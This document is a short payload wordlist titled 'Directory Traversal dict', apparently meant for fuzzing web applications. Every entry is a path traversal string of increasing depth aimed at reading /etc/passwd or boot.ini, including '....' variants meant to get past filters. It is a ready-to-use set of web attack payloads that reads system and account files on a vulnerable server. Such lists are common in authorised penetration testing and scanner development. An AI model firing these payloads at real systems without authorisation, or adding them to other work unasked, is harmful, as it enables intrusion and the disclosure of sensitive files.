# Directory Traversal dict

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
..../etc/passwd
..../..../etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
..../..../..../..../..../etc/passwd
..../..../..../..../..../..../etc/passwd
..../..../..../..../..../..../..../etc/passwd
..../..../..../..../..../..../..../..../etc/passwd
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini'
